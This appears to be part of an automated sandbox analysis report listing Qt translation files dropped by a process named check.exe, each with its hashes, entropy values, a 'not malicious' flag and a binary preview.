                                                                                                                                                                                                            Preview:<.d....!..`.......ltB..0X...*..)C...+...|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E..*....................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):89
                                                                                                                                                                                                            Entropy (8bit):4.156834975253888
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                            MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                            SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                            SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                            SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161
                                                                                                                                                                                                            Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                            MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                            SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                            SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                            SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70334
                                                                                                                                                                                                            Entropy (8bit):4.732724622610353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                            MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                            SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                            SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                            SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pt_PTB...(...*...9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,.*.y.....*.y..o..*.y.....*.T..L..*.0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):3.984562388316898
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                            MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                            SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                            SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                            SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                            MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                            SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                            SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                            SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):228428
                                                                                                                                                                                                            Entropy (8bit):4.726953418955661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                            MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                            SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                            SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                            SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65851
                                                                                                                                                                                                            Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                            MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                            SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                            SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                            SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...B.......*.......+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,...........*......i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y.....*.y.../.*.y..h..*.y.....*.T..J..*.0..'[.*.0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                            Entropy (8bit):3.630483009136986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                            MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                            SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                            SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                            SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):4.021402900389864
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                            MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                            SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                            SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                            SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117347
                                                                                                                                                                                                            Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                            MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                            SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                            SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                            SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB..+....*.......+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`......*........................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):141
                                                                                                                                                                                                            Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                            MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                            SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                            SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                            SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160017
                                                                                                                                                                                                            Entropy (8bit):5.35627970915292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                            MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                            SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                            SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                            SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165337
                                                                                                                                                                                                            Entropy (8bit):5.332219158085151
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                            MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                            SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                            SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                            SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg_BGB../....*..,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O...........*...}..,............=...Q...m..,....t...|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):210159
                                                                                                                                                                                                            Entropy (8bit):4.666388181115542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                            MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                            SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                            SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                            SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174701
                                                                                                                                                                                                            Entropy (8bit):4.87192387061682
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                            MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                            SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                            SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                            SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB..3p...*..F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9...............*...;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):181387
                                                                                                                                                                                                            Entropy (8bit):4.755193800761075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                            MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                            SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                            SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                            SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB..4....*..h....+......@...f...A.......B.......C.......D...U...E.......F...v...G.......H.......I.......P.......Q.......R...6...S...Z...T...~...U.......V.......W..."...X...F...Y...j...]..+....s.......t..................-...;..+....;..,....;../....;..;....M..+....O.......O...r...........}..,............=...8...m..,0...t...c......T...(5..B...+;..NH..+;..~H..+O..,...1...UP..D@......E@......H4...E..HY..j...H.......IC...#..J....J..J.......J.......LD......L....1..PS...B..QR......R...o...T.......U.......X.......Zr......[`...W..\....}..]x...[.._....-.._.......yg...e..1...O....E..R....7..........-!......]............................$..k....[...7...,.......y...c...y.................j4...........9..l8...E..p............z...;..................%..a....D...~.............-.....L......OH.....Uz...5.......0.......0...U...0.......0..p....5...7...5..L$..............p... D..-... D..i...+....@..<U.....<U.....<....S..H5..-2..H5..j$..L....B..VE.. ...VE..P...V...*...f...e...f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):220467
                                                                                                                                                                                                            Entropy (8bit):4.626295310482312
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                            MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                            SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                            SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                            SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
